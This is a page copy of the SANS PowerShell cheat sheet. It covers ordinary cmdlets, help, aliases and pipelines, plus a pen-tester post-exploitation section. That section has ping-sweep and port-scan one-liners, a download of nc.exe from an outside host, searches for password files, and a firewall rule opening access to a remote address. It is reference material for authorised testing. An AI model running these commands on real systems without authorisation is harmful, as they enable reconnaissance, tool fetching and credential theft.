Scribd
Upload
323 views9 pages

SANS PowerShell Cheat Sheet

The document is a cheat sheet describing common PowerShell options and techniques. It provides an overview of PowerShell and how to launch it. It then lists and describes useful PowerShell cmdlets for tasks like file operations, finding text in files, viewing processes and services, and formatting and exporting command output. It also gives examples for post-exploitation tasks and describes PowerShell syntax, finding cmdlets, getting help, aliases, and techniques like piping, looping, and variables.

Uploaded by

Raistlin Majere
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
323 views9 pages

SANS PowerShell Cheat Sheet

The document is a cheat sheet describing common PowerShell options and techniques. It provides an overview of PowerShell and how to launch it. It then lists and describes useful PowerShell cmdlets for tasks like file operations, finding text in files, viewing processes and services, and formatting and exporting command output. It also gives examples for post-exploitation tasks and describes PowerShell syntax, finding cmdlets, getting help, aliases, and techniques like piping, looping, and variables.

Uploaded by

Raistlin Majere
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

SANS PowerShell Cheat Sheet

Purpose
The purpose of this cheat sheet is to describe some common options and techniques for
use in Microsoft’s PowerShell.

PowerShell Overview
PowerShell Background

PowerShell is the successor to command.com, cmd.exe and cscript. Initially released as a


separate download, it is now built in to all modern versions of Microsoft Windows.
PowerShell syntax takes the form of verb-noun patterns implemented in cmdlets.

Launching PowerShell
PowerShell is accessed by pressing Start -> typing powershell and pressing enter. Some
operations require administrative privileges and can be accomplished by launching
PowerShell as an elevated session. You can launch an elevated PowerShell by pressing Start
-> typing powershell and pressing Shift-CTRL-Enter.

Additionally, PowerShell cmdlets can be called from cmd.exe by typing:

C:\> powershell -c "<command>"

Useful Cmdlets (and aliases)


Get a director y listing (ls, dir, gci):

PS C:\> Get-ChildItem

Copy a file (cp, copy, cpi):

PS C:\> Copy-Item src.txt dst.txt

Move a file (mv, move, mi):

PS C:\> Move-Item src.txt dst.txt

1/9
Find text within a file:

PS C:\> Select-String –path c:\users\*.txt –pattern password

PS C:\> ls -r c:\users\*.txt -file | % {Select-String -path $_ -


pattern password}

Display file contents (cat, type, gc):

PS C:\> Get-Content file.txt

Get present director y (pwd, gl):

PS C:\> Get-Location

Get a process listing (ps, gps):

PS C:\> Get-Process

Get a ser vice listing:

PS C:\> Get-Service

Formatting output of a command (Format-List):

PS C:\> ls | Format-List –property name

Paginating output:

PS C:\> ls –r | Out-Host -paging

Get the SHA1 hash of a file:

2/9
PS C:\> Get-FileHash -Algorithm SHA1 file.txt

Expor ting output to CSV:

PS C:\> Get-Process | Export-Csv procs.csv

PowerShell for Pen-Tester Post-Exploitation


Conduct a ping sweep:

PS C:\> 1..255 | % {echo "10.10.10.$_";ping -n 1 -w 100


10.10.10.$_ | Select-String ttl}

Conduct a por t scan:

PS C:\> 1..1024 | % {echo ((new-object


Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is
open!"} 2>$null

Fetch a file via HTTP (wget in PowerShell):

PS C:\> (New-Object
System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","
nc.exe")

Find all files with a par ticular name:

PS C:\> Get-ChildItem "C:\Users\" -recurse -include


*passwords*.txt

Get a listing of all installed Microsoft Hotfixes:

PS C:\> Get-HotFix

Navigate the Windows registr y:

3/9
PS C:\> cd HKLM:\
PS HKLM:\> ls

List programs set to star t automatically in the registr y:

PS C:\> Get-ItemProperty
HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run

Conver t string from ascii to Base64:

PS C:\>
[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.Ge
tBytes("PSFTW!"))

List and modify the Windows firewall rules:

PS C:\> Get-NetFirewallRule –all


PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn -
RemoteAddress 10.10.10.25

Syntax
Cmdlets are small scripts that follow a dashseparated
verb-noun convention such as "Get-Process".
Similar Verbs with Different Actions:

New- Creates a new resource


Set- Modifies an existing resource
Get- Retrieves an existing resource
Read- Gets information from a source, such as a file
Find- Used to look for an object
Search- Used to create a reference to a resource
Star t- (asynchronous) begin an operation, such as starting a process
Invoke- (synchronous) perform an operation such as running a command

Parameters:
Each verb-noun named cmdlet may have many parameters to control cmdlet functionality.

Objects:
The output of most cmdlets are objects that can be passed to other cmdlets and further
acted upon. This becomes important in pipelining cmdlets.

4/9
Finding Cmdlets
To get a list of all available cmdlets:

PS C:\> Get-Command

Get-Command suppor ts filtering. To filter cmdlets on the verb set:

PS C:\> Get-Command Set*

PS C:\> Get-Command –Verb Set

Or on the noun process:

PS C:\> Get-Command *Process

PS C:\> Get-Command –Noun process

Getting Help
To get help with help:

PS C:\> Get-Help

To read cmdlet self documentation:

PS C:\> Get-Help <cmdlet>

Detailed help:

PS C:\> Get-Help <cmdlet> -detailed

Usage examples:

5/9
PS C:\> Get-Help <cmdlet> -examples

Full (ever ything) help:

PS C:\> Get-Help <cmdlet> -full

Online help (if available):

PS C:\> Get-Help <cmdlet> -online

Cmdlet Aliases
Aliases provide short references to long commands.

To list available aliases (alias alias):

PS C:\> Get-Alias

To expand an alias into a full name:

PS C:\> alias <unknown alias>

PS C:\> alias gcm

Efficient PowerShell
Tab completion:

PS C:\> get-child<TAB>

PS C:\> Get-ChildItem

Parameter shor tening:

6/9
PS C:\> ls –recurse

is equivalent to:

PS C:\> ls -r

5 PowerShell Essentials
Shows help & examples

PS C:\> Get-Help [cmdlet] -examples

Alias

PS C:\> help [cmdlet] -examples

Shows a list of commands

PS C:\> Get-Command

Alias

PS C:\> gcm *[string]*

Shows proper ties & methods

PS C:\> [cmdlet] | Get-Member

Alias

PS C:\> [cmdlet] | gm

Takes each item on pipeline and handles it as $_

7/9
PS C:\> ForEach-Object { $_ }

Alias

PS C:\> [cmdlet] | % { [cmdlet] $_ }

Searches for strings in files or output, like grep

PS C:\> Select-String

Alias

PS C:\> sls –path [file] –pattern [string]

Pipelining, Loops, and Variables


Piping cmdlet output to another cmdlet:

PS C:\> Get-Process | Format-List –property name

ForEach-Object in the pipeline (alias %):

PS C:\> ls *.txt | ForEach-Object {cat $_}

Where-Object condition (alias where or ?):

PS C:\> Get-Process | Where-Object {$_.name –eq "notepad"}

Generating ranges of numbers and looping:

PS C:\> 1..10

8/9
PS C:\> 1..10 | % {echo "Hello!"}

Creating and listing variables:

PS C:\> $tmol = 42

PS C:\> ls variable:

Examples of passing cmdlet output down pipeline:

PS C:\> dir | group extension | sort

PS C:\> Get-Service dhcp | Stop-Service -PassThru | Set-Service


-StartupType Disabled

Additional Info
The original SANS PowerShell Pocket Reference Guide (B&W TriFold) is available here:
Original SANS PowerShell CheatSheet

A printable PDF version of the cheatsheet using this format is available here:
SANS PS CheatSheet

Cheat Sheet Version


Version 4.0

9/9

You might also like